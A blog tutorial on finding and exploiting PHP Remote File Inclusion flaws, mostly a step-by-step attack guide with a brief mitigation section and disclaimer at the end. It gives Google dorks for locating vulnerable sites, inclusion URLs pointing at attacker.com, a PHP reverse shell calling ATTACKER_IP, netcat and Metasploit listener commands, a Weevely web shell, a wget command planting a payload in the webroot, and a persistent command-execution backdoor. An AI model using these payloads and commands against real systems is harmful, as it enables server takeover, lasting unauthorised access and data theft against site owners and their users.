Understanding and Exploiting Remote File Inclusion (RFI) Vulnerabilities

Introduction to Remote File Inclusion

 

Remote File Inclusion (RFI) is a critical web vulnerability that allows attackers to include external files in a web application, leading to the execution of arbitrary code on the server. This vulnerability is commonly found in web applications that dynamically include files based on user input but fail to properly validate or sanitize these inputs.

 

RFI can lead to various severe consequences, including remote code execution, data theft, website defacement, and full system compromise. Understanding how to identify and exploit RFI vulnerabilities is crucial for both ethical hackers and web developers to ensure robust security measures.

 

 

Identifying RFI Vulnerabilities

 

RFI vulnerabilities typically occur in web applications where file paths are included based on user input. Consider the following PHP code snippet:

 

<?php
$page = $_GET['page'];
include($page);
?>

 

If the above code does not validate or sanitize the page parameter, an attacker can include a remote file by manipulating the URL:

 

http://example.com/index.php?page=http://evil.com/shell.txt

 

 

Finding Vulnerable Sites

 

Using Google Dorks

 

Google dorks are search queries that reveal potentially vulnerable websites. Some useful Google dorks for finding RFI vulnerabilities include:

 

  • inurl:index.php?page=
  • inurl:load.php?file=
  • inurl:include.php?path=
  • inurl:viewer.php?file=

 

For example, a search query like:

 

inurl:index.php?page=

 

might reveal URLs that include user input in the page parameter.

 

Manual Testing

 

To identify potential RFI vulnerabilities manually, follow these steps:

 

  1. Inspect URL Parameters: Look for URLs that include file parameters, such as page, file, document, template, etc.

http://example.com/index.php?page=about.php

 

      2. Test for File Inclusion: Try to include a local file by manipulating the parameter.

 

http://example.com/index.php?page=../../../../etc/passwd

 

      3. Test for Remote Inclusion: Attempt to include a remote file by manipulating the parameter.

 

http://example.com/index.php?page=http://attacker.com/shell.txt

 

 

Automated Scanners

 

Several automated tools can scan websites for RFI vulnerabilities:

 

  1. Nikto: Nikto is a web server scanner that tests for various vulnerabilities, including RFI.

nikto -h http://example.com

 

  1. Burp Suite: Burp Suite is a comprehensive web vulnerability scanner that can identify RFI among other issues. Use the scanner module to identify potential vulnerabilities.
  2. OWASP ZAP: OWASP ZAP is another popular web application security scanner that can detect RFI vulnerabilities.

 

zap-baseline.py -t http://example.com

 

Testing for RFI Vulnerability

 

 

To confirm a site’s vulnerability to RFI, you can attempt to include a remote file:

 

 

http://example.com/index.php?page=http://attacker.com/test.txt

 

 

If the remote file is included and executed, the site is vulnerable. An easy way to test this is to include a file with a simple command:

 

 

http://example.com/index.php?page=http://attacker.com/test.txt

 

Where test.txt contains:

 

<?php echo 'Vulnerable to RFI'; ?>

 

 

If you see “Vulnerable to RFI” on the page, the site is vulnerable.

 

Crafting a Malicious File for Reverse Shell

 

A common payload for exploiting RFI is a PHP reverse shell script. Below is a simple example of a PHP reverse shell (shell.php):

 

<?php
$ip = 'ATTACKER_IP';
$port = ATTACKER_PORT;
$sock = fsockopen($ip, $port);
exec('/bin/sh -i <&3 >&3 2>&3');
?>

 

Replace ATTACKER_IP and ATTACKER_PORT with the attacker’s IP address and port number.

 

Tools for Reverse Connection

 

Once the malicious file is uploaded and included, various tools can be used to catch the reverse shell connection:

 

  1. Netcat: Netcat is a versatile networking tool used for creating reverse shell listeners:

nc -lvnp 4444

 

      2. Metasploit: Metasploit is a powerful framework for exploitation and post-exploitation:

 

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
exploit

 

3. Weevely: Weevely is a stealthy web shell tool useful for post-exploitation:

 

weevely generate mypassword shell.php

 

Upload shell.php to the target server and connect:

 

weevely http://example.com/shell.php mypassword

 

 

Exploiting RFI Vulnerabilities

 

Step-by-Step Exploitation Example

 

  1. Identify Vulnerable Site: Use Google dorks to find a potential target:

inurl:index.php?page=

Suppose we find a site:

http://vulnerable.com/index.php?page=

 

 

     2. Test for Vulnerability: Attempt to include a remote test file:

http://vulnerable.com/index.php?page=http://attacker.com/test.txt

 

Ensure test.txt contains:

<?php echo 'Vulnerable to RFI'; ?>

 

    3. Prepare Reverse Shell: Create a reverse shell script shell.php:

 

<?php
$ip = '192.168.1.10';
$port = 4444;
$sock = fsockopen($ip, $port);
exec('/bin/sh -i <&3 >&3 2>&3');
?>

 

   4. Host Malicious File: Place shell.php on your server at http://attacker.com/shell.php.

 

   5. Start Listener: On your machine, start a Netcat listener:

 

nc -lvnp 4444

 

   6. Exploit RFI: Trigger the inclusion:

http://vulnerable.com/index.php?page=http://attacker.com/shell.php

 

   7. Gain Shell Access: If successful, you will receive a reverse shell connection:

nc -lvnp 4444

connect to [192.168.1.10] from (UNKNOWN) [target_ip] 12345
/bin/sh: no job control in this shell
$

 

 

Modifying and Uploading Files

 

Once you have shell access, you can upload files to the server. One way to do this is using the wget command to download files directly from your server:

 

wget http://attacker.com/newfile.php -O /var/www/html/newfile.php

 

Alternatively, you can echo the contents of a file into a new file on the server:

 

echo '<?php phpinfo(); ?>' > /var/www/html/phpinfo.php

 

Further Exploitation

 

 

Persistent Backdoor

 

To maintain access, upload a persistent backdoor:

 

<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>

 

Save this as backdoor.php on the target server. You can then execute commands by accessing:

 

http://vulnerable.com/backdoor.php?cmd=ls

 

Mitigation

 

To protect against RFI vulnerabilities:

 

  1. Input Validation: Validate and sanitize all user inputs. Never include files based on untrusted user input.

      2. Use Whitelisting: Only allow specific, trusted files to be included.

 

      3. Disable Remote File Inclusion: In PHP, disable allow_url_include by setting it to 0 in the php.ini configuration file:

allow_url_include = 0

 

      4. Regular Security Audits: Regularly scan and audit your codebase for vulnerabilities using automated tools and manual review.

 

Conclusion

 

Remote File Inclusion is a dangerous vulnerability that can lead to a complete compromise of a web server. Understanding how to find and exploit these vulnerabilities is crucial for web security professionals. Always ensure you have permission before testing for vulnerabilities and use this knowledge responsibly.

Happy hacking! 🚀

 

 

Disclaimer

 

The information provided here is for educational purposes only. Any unethical use of this information is not our responsibility.

 

 

Follow us on:-

 

Facebook: https://fb.com/skillcef

Linkedin: https://linkedin.com/company/skillcef

 

 

skillcef

Skillcef admin responsible for creative content idea generation and publishing

Search


Categories

Recent Posts

Tags